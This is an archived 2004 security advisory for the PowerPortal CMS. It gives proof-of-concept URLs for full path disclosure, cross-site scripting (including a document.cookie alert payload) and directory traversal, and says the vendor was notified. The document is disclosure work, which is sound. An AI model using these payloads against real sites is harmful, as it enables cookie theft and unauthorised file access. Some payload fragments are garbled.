TUCoPS :: Web :: CMS / Portals :: hack3447.htm

PowerPortal Multiple vulnerabilities
Multiple vulnerabilities PowerPortal

http://www.swp-zone.org/archivos/advisory-07.txt 

-------------------------------------------------------------------------------------------------

                            :.: Multiple vulnerabilities PowerPortal :.: 

  PROGRAM: PowerPortal
  HOMEPAGE: http://powerportal.sourceforge.net/ 
  VERSION: v1.x
  BUG: Multiple vulnerabilities
  DATE:  23/05/2004
  AUTHOR: DarkBicho
          web: http://www.darkbicho.tk 
          team: Security Wari Proyects  
          Email: darkbicho@peru.com 

-------------------------------------------------------------------------------------------------

1.- Affected software description:
    ------------------------------

    PowerPortal is a popular content management system, written in php


2.- Vulnerabilities:
    ---------------


 A. Full path disclosure:

    This vulnerability would allow a remote user to determine the full
    path to the web root directory and other potentially sensitive
    information.
    
    :.: Examples:

    * http://attacker/modules/gallery/resize.php 

    
Warning: imagecreatetruecolor(): Invalid image dimensions in c:\appserv\www\power\modules\gallery\resize.php on line 18

Warning: imagecopyresized(): supplied argument is not a valid Image resource in c:\appserv\www\power\modules\gallery\resize.php on line 20

Warning: imagejpeg(): supplied argument is not a valid Image resource in c:\appserv\www\power\modules\gallery\resize.php on line 23
* http://attacker/power/modules.php?name=gallery&files=darkbicho Warning: opendir(c:\appserv\www\power\modules\gallery/../../modules/gallery/images/darkbicho): failed to open dir: Invalid argument in c:\appserv\www\power\modules\gallery\index.php on line 99 B. Cross-Site Scripting aka XSS: http://attacker/modules.php?name=private_messages&file=reply&id=' > http://attacker/modules.php?name=links&search=&func=search_results http://attacker/modules.php?name=content&file=search&search= t>alert(document.cookie);&func=results http://attacker/modules.php?name=gallery&files= C. Arbitrary directory browsing: * http://attacker/modules.php?name=gallery&files=/../../../ 3.- SOLUTION: จจจจจจจจ Vendors were contacted many weeks ago and plan to release a fixed version soon. Check the PowerPortal website for updates and official release details. 4.- Greetings: --------- greetings to my Peruvian group swp and perunderforce :D "EL PISCO ES Y SERA PERUANO" 5.- Contact ------- WEB: http://www.darkbicho.tk EMAIL: darkbicho@peru.com ------------------------------------------------------------------------------------------------- ___________ ____________ / _____/ \ / \______ \ \_____ \\ \/\/ /| ___/ / \\ / | | /_______ / \__/\ / |____| \/ \/ Security Wari Projects (c) 2002 - 2004 Made in Peru ----------------------------------------[ EOF ]----------------------------------------------         DarkBicho Web: http://www.darkbicho.tk "Mi unico delito es ver lo que otros no pueden ver" ---------------------- The End ----------------------

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH